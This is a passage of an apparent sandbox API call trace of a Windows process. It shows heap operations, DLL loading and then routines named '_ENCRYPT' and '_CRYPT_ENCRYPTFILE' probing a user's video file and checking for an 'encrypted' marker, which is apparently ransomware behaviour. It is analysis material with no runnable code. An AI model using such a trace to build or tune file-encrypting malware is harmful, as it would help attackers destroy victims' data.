hHeap=0x770000) returned 1 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.986] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.987] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.988] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0043.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.988] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.988] CloseHandle (hObject=0x140) returned 1 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.988] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.989] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.989] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.989] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.989] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.989] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.989] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x23ba0970, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tvat.swf", cAlternateFileName="")) returned 0x7c20c0 [0043.990] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x23ba0970, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tvat.swf", cAlternateFileName="")) returned 0x7c20c0 [0043.990] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tvat.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.992] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.992] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.992] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.992] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.992] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.992] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.992] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.992] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.992] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 